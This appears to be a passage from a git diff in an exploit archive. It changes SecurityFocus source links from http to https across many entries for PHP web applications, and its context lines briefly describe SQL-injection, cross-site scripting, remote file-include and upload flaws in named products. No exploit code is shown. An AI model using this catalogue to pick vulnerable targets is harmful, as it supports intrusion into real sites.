vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28041.txt b/exploits/php/webapps/28041.txt index 45ca9d59b..bd261f335 100644 --- a/exploits/php/webapps/28041.txt +++ b/exploits/php/webapps/28041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28042.txt b/exploits/php/webapps/28042.txt index 6c7e9ed01..9b4259dba 100644 --- a/exploits/php/webapps/28042.txt +++ b/exploits/php/webapps/28042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28043.txt b/exploits/php/webapps/28043.txt index 49fbd7f0f..caf3ea080 100644 --- a/exploits/php/webapps/28043.txt +++ b/exploits/php/webapps/28043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28045.txt b/exploits/php/webapps/28045.txt index dcd9c7e09..c5366a923 100644 --- a/exploits/php/webapps/28045.txt +++ b/exploits/php/webapps/28045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28046.txt b/exploits/php/webapps/28046.txt index 9e2cf2c3e..7ec1af917 100644 --- a/exploits/php/webapps/28046.txt +++ b/exploits/php/webapps/28046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28047.txt b/exploits/php/webapps/28047.txt index 8952453d7..7473e380b 100644 --- a/exploits/php/webapps/28047.txt +++ b/exploits/php/webapps/28047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18489/info +source: https://www.securityfocus.com/bid/18489/info CMS Faethon is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28048.txt b/exploits/php/webapps/28048.txt index 7d9f43445..eef7a67fe 100644 --- a/exploits/php/webapps/28048.txt +++ b/exploits/php/webapps/28048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18490/info +source: https://www.securityfocus.com/bid/18490/info RahnemaCo is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28057.txt b/exploits/php/webapps/28057.txt index 338a1eafb..6011902e2 100644 --- a/exploits/php/webapps/28057.txt +++ b/exploits/php/webapps/28057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18491/info +source: https://www.securityfocus.com/bid/18491/info Cline Communications is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28058.txt b/exploits/php/webapps/28058.txt index dbb68eda2..56242b714 100644 --- a/exploits/php/webapps/28058.txt +++ b/exploits/php/webapps/28058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18499/info +source: https://www.securityfocus.com/bid/18499/info Eduha Meeting is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28059.txt b/exploits/php/webapps/28059.txt index d8019a5a2..aac4fc059 100644 --- a/exploits/php/webapps/28059.txt +++ b/exploits/php/webapps/28059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18501/info +source: https://www.securityfocus.com/bid/18501/info The saphplesson module is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28060.txt b/exploits/php/webapps/28060.txt index 6768733dc..06fe615b9 100644 --- a/exploits/php/webapps/28060.txt +++ b/exploits/php/webapps/28060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18502/info +source: https://www.securityfocus.com/bid/18502/info Datecomm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28063.txt b/exploits/php/webapps/28063.txt index 3ba3acf13..095836e83 100644 --- a/exploits/php/webapps/28063.txt +++ b/exploits/php/webapps/28063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18508/info +source: https://www.securityfocus.com/bid/18508/info e107 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28064.txt b/exploits/php/webapps/28064.txt index 32e778aa1..f9e3a132c 100644 --- a/exploits/php/webapps/28064.txt +++ b/exploits/php/webapps/28064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18510/info +source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28066.txt b/exploits/php/webapps/28066.txt index 9e07f045e..d08e13aae 100644 --- a/exploits/php/webapps/28066.txt +++ b/exploits/php/webapps/28066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18518/info +source: https://www.securityfocus.com/bid/18518/info singapore gallery is prone to directory-traversal and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28067.txt b/exploits/php/webapps/28067.txt index ea7814eaf..8de5c629f 100644 --- a/exploits/php/webapps/28067.txt +++ b/exploits/php/webapps/28067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18518/info +source: https://www.securityfocus.com/bid/18518/info singapore gallery is prone to directory-traversal and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28068.txt b/exploits/php/webapps/28068.txt index 1c33b6e6b..bd1f4a09f 100644 --- a/exploits/php/webapps/28068.txt +++ b/exploits/php/webapps/28068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28069.txt b/exploits/php/webapps/28069.txt index c30d1f283..864cb5805 100644 --- a/exploits/php/webapps/28069.txt +++ b/exploits/php/webapps/28069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28070.txt b/exploits/php/webapps/28070.txt index 2ce49f18c..e1cf11897 100644 --- a/exploits/php/webapps/28070.txt +++ b/exploits/php/webapps/28070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28071.txt b/exploits/php/webapps/28071.txt index f791fc7ac..24ae0c0bb 100644 --- a/exploits/php/webapps/28071.txt +++ b/exploits/php/webapps/28071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28072.txt b/exploits/php/webapps/28072.txt index a3726eb6e..851c0b793 100644 --- a/exploits/php/webapps/28072.txt +++ b/exploits/php/webapps/28072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28073.txt b/exploits/php/webapps/28073.txt index 938e2e343..9b4b3e9b6 100644 --- a/exploits/php/webapps/28073.txt +++ b/exploits/php/webapps/28073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28074.txt b/exploits/php/webapps/28074.txt index f68eb461d..8a8656a35 100644 --- a/exploits/php/webapps/28074.txt +++ b/exploits/php/webapps/28074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28075.txt b/exploits/php/webapps/28075.txt index 1fcade749..b605463fa 100644 --- a/exploits/php/webapps/28075.txt +++ b/exploits/php/webapps/28075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28076.txt b/exploits/php/webapps/28076.txt index 4497dcb25..4fc4dfc23 100644 --- a/exploits/php/webapps/28076.txt +++ b/exploits/php/webapps/28076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18551/info +source: https://www.securityfocus.com/bid/18551/info Vbulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28078.txt b/exploits/php/webapps/28078.txt index fda6a3100..9616c74b5 100644 --- a/exploits/php/webapps/28078.txt +++ b/exploits/php/webapps/28078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18560/info +source: https://www.securityfocus.com/bid/18560/info The e107 CMS is prone to an HTML-injection vulnerability. diff --git a/exploits/php/webapps/28088.txt b/exploits/php/webapps/28088.txt index 6144d0c64..6c176efb2 100644 --- a/exploits/php/webapps/28088.txt +++ b/exploits/php/webapps/28088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18593/info +source: https://www.securityfocus.com/bid/18593/info PHP Event Calendar is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28089.txt b/exploits/php/webapps/28089.txt index 2eb964183..fb4e7d6fc 100644 --- a/exploits/php/webapps/28089.txt +++ b/exploits/php/webapps/28089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28090.txt b/exploits/php/webapps/28090.txt index 9995c571d..5cb89fecc 100644 --- a/exploits/php/webapps/28090.txt +++ b/exploits/php/webapps/28090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28091.txt b/exploits/php/webapps/28091.txt index a5714d4e8..7f7c668ad 100644 --- a/exploits/php/webapps/28091.txt +++ b/exploits/php/webapps/28091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28092.txt b/exploits/php/webapps/28092.txt index 26023b6a2..624d224c8 100644 --- a/exploits/php/webapps/28092.txt +++ b/exploits/php/webapps/28092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18602/info +source: https://www.securityfocus.com/bid/18602/info MyBulletinBoard is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28093.txt b/exploits/php/webapps/28093.txt index b521e08ef..c457a223b 100644 --- a/exploits/php/webapps/28093.txt +++ b/exploits/php/webapps/28093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28094.txt b/exploits/php/webapps/28094.txt index b21617482..5b9bfc1c8 100644 --- a/exploits/php/webapps/28094.txt +++ b/exploits/php/webapps/28094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28095.txt b/exploits/php/webapps/28095.txt index c7cfffd54..6b4bd4870 100644 --- a/exploits/php/webapps/28095.txt +++ b/exploits/php/webapps/28095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28096.txt b/exploits/php/webapps/28096.txt index 205ca7aec..b187b32ec 100644 --- a/exploits/php/webapps/28096.txt +++ b/exploits/php/webapps/28096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28097.txt b/exploits/php/webapps/28097.txt index 81f6cf4e6..b9dde8278 100644 --- a/exploits/php/webapps/28097.txt +++ b/exploits/php/webapps/28097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18607/info +source: https://www.securityfocus.com/bid/18607/info Dating Agent is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28098.txt b/exploits/php/webapps/28098.txt index b371920cc..410bb11ae 100644 --- a/exploits/php/webapps/28098.txt +++ b/exploits/php/webapps/28098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18609/info +source: https://www.securityfocus.com/bid/18609/info PHP Blue Dragon CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28101.txt b/exploits/php/webapps/28101.txt index 6a3d69b0e..dee50ad78 100644 --- a/exploits/php/webapps/28101.txt +++ b/exploits/php/webapps/28101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18626/info +source: https://www.securityfocus.com/bid/18626/info Custom Dating Biz is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28102.txt b/exploits/php/webapps/28102.txt index c547ad042..221b2b4a2 100644 --- a/exploits/php/webapps/28102.txt +++ b/exploits/php/webapps/28102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18629/info +source: https://www.securityfocus.com/bid/18629/info Winged Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28104.txt b/exploits/php/webapps/28104.txt index 4e84a65eb..c65b873aa 100644 --- a/exploits/php/webapps/28104.txt +++ b/exploits/php/webapps/28104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18638/info +source: https://www.securityfocus.com/bid/18638/info ADOdb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28105.txt b/exploits/php/webapps/28105.txt index 28f7324fa..e538175a6 100644 --- a/exploits/php/webapps/28105.txt +++ b/exploits/php/webapps/28105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18649/info +source: https://www.securityfocus.com/bid/18649/info eNpaper1 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28106.txt b/exploits/php/webapps/28106.txt index 654dc5667..64fcf98e2 100644 --- a/exploits/php/webapps/28106.txt +++ b/exploits/php/webapps/28106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18654/info +source: https://www.securityfocus.com/bid/18654/info Bee-hive is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28107.txt b/exploits/php/webapps/28107.txt index 1caf70ff0..34dfc26a2 100644 --- a/exploits/php/webapps/28107.txt +++ b/exploits/php/webapps/28107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18655/info +source: https://www.securityfocus.com/bid/18655/info Cpanel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28108.txt b/exploits/php/webapps/28108.txt index 564f91b58..d24623b85 100644 --- a/exploits/php/webapps/28108.txt +++ b/exploits/php/webapps/28108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18656/info +source: https://www.securityfocus.com/bid/18656/info MyMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28109.txt b/exploits/php/webapps/28109.txt index b215c54e7..2c0631caf 100644 --- a/exploits/php/webapps/28109.txt +++ b/exploits/php/webapps/28109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18662/info +source: https://www.securityfocus.com/bid/18662/info Usenet is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28110.txt b/exploits/php/webapps/28110.txt index 453dfc85d..321121038 100644 --- a/exploits/php/webapps/28110.txt +++ b/exploits/php/webapps/28110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18663/info +source: https://www.securityfocus.com/bid/18663/info mvnForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28111.txt b/exploits/php/webapps/28111.txt index e3ee6ef66..f73e7f7dd 100644 --- a/exploits/php/webapps/28111.txt +++ b/exploits/php/webapps/28111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18666/info +source: https://www.securityfocus.com/bid/18666/info OpenGuestbook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28112.txt b/exploits/php/webapps/28112.txt index 50975a27c..6adc94c82 100644 --- a/exploits/php/webapps/28112.txt +++ b/exploits/php/webapps/28112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18666/info +source: https://www.securityfocus.com/bid/18666/info OpenGuestbook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28113.txt b/exploits/php/webapps/28113.txt index 1f864da61..940aff0d6 100644 --- a/exploits/php/webapps/28113.txt +++ b/exploits/php/webapps/28113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18671/info +source: https://www.securityfocus.com/bid/18671/info cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28114.txt b/exploits/php/webapps/28114.txt index ffc105cb6..1dc4c518c 100644 --- a/exploits/php/webapps/28114.txt +++ b/exploits/php/webapps/28114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18674/info +source: https://www.securityfocus.com/bid/18674/info CrisoftRicette is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28115.txt b/exploits/php/webapps/28115.txt index 8ec1d9bc9..853941db3 100644 --- a/exploits/php/webapps/28115.txt +++ b/exploits/php/webapps/28115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18676/info +source: https://www.securityfocus.com/bid/18676/info MF Piadas is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28117.txt b/exploits/php/webapps/28117.txt index 34401e965..2e5f7c8d4 100644 --- a/exploits/php/webapps/28117.txt +++ b/exploits/php/webapps/28117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18679/info +source: https://www.securityfocus.com/bid/18679/info MF Piadas is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28119.txt b/exploits/php/webapps/28119.txt index 3e2be1415..b7c78b5d9 100644 --- a/exploits/php/webapps/28119.txt +++ b/exploits/php/webapps/28119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28120.txt b/exploits/php/webapps/28120.txt index 19a1d2e91..0ab4df1c0 100644 --- a/exploits/php/webapps/28120.txt +++ b/exploits/php/webapps/28120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28121.txt b/exploits/php/webapps/28121.txt index 881ed9cc2..a7fa632f6 100644 --- a/exploits/php/webapps/28121.txt +++ b/exploits/php/webapps/28121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28122.txt b/exploits/php/webapps/28122.txt index eb35ddcd5..387863247 100644 --- a/exploits/php/webapps/28122.txt +++ b/exploits/php/webapps/28122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28124.pl b/exploits/php/webapps/28124.pl index b3be3eef4..d98136ccf 100755 --- a/exploits/php/webapps/28124.pl +++ b/exploits/php/webapps/28124.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18707/info +source: https://www.securityfocus.com/bid/18707/info MKPortal is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28125.txt b/exploits/php/webapps/28125.txt index cebbb2033..3f63025b4 100644 --- a/exploits/php/webapps/28125.txt +++ b/exploits/php/webapps/28125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18713/info +source: https://www.securityfocus.com/bid/18713/info The 'phpclassifieds.info' product is prone to multiple input-validation vulnerabilities. The issues include HTML- and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28131.txt b/exploits/php/webapps/28131.txt index 0d72c5baf..a85c80d78 100644 --- a/exploits/php/webapps/28131.txt +++ b/exploits/php/webapps/28131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18721/info +source: https://www.securityfocus.com/bid/18721/info PHP iCalender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28132.txt b/exploits/php/webapps/28132.txt index b1089c374..55ce7e3b8 100644 --- a/exploits/php/webapps/28132.txt +++ b/exploits/php/webapps/28132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28133.txt b/exploits/php/webapps/28133.txt index a6135fbe5..6614c3aa3 100644 --- a/exploits/php/webapps/28133.txt +++ b/exploits/php/webapps/28133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28134.txt b/exploits/php/webapps/28134.txt index 9865facab..0be6a97ac 100644 --- a/exploits/php/webapps/28134.txt +++ b/exploits/php/webapps/28134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28136.pl b/exploits/php/webapps/28136.pl index e0746310b..96dab1ebb 100755 --- a/exploits/php/webapps/28136.pl +++ b/exploits/php/webapps/28136.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18729/info +source: https://www.securityfocus.com/bid/18729/info Vincent-Leclercq News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28137.txt b/exploits/php/webapps/28137.txt index 7f44aa550..9a4dcc469 100644 --- a/exploits/php/webapps/28137.txt +++ b/exploits/php/webapps/28137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28138.txt b/exploits/php/webapps/28138.txt index 8109f53d9..8f358cfd2 100644 --- a/exploits/php/webapps/28138.txt +++ b/exploits/php/webapps/28138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28139.txt b/exploits/php/webapps/28139.txt index fc3e816fc..a7f053571 100644 --- a/exploits/php/webapps/28139.txt +++ b/exploits/php/webapps/28139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28140.txt b/exploits/php/webapps/28140.txt index cbb330a1c..7b4328c69 100644 --- a/exploits/php/webapps/28140.txt +++ b/exploits/php/webapps/28140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28141.txt b/exploits/php/webapps/28141.txt index 0609bcd4b..8a7662c28 100644 --- a/exploits/php/webapps/28141.txt +++ b/exploits/php/webapps/28141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18756/info +source: https://www.securityfocus.com/bid/18756/info SiteBuilder-FX is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28142.txt b/exploits/php/webapps/28142.txt index b7a797aa1..e3ba9961f 100644 --- a/exploits/php/webapps/28142.txt +++ b/exploits/php/webapps/28142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18760/info +source: https://www.securityfocus.com/bid/18760/info Diesel Joke Site is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28143.pl b/exploits/php/webapps/28143.pl index 01a183a11..fa5d2a2c5 100755 --- a/exploits/php/webapps/28143.pl +++ b/exploits/php/webapps/28143.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18764/info +source: https://www.securityfocus.com/bid/18764/info SturGeoN Upload is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28146.txt b/exploits/php/webapps/28146.txt index 0ab197e67..907ff00d0 100644 --- a/exploits/php/webapps/28146.txt +++ b/exploits/php/webapps/28146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18775/info +source: https://www.securityfocus.com/bid/18775/info Vincent Leclercq News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28147.txt b/exploits/php/webapps/28147.txt index 10e820f5b..cf7e9e24e 100644 --- a/exploits/php/webapps/28147.txt +++ 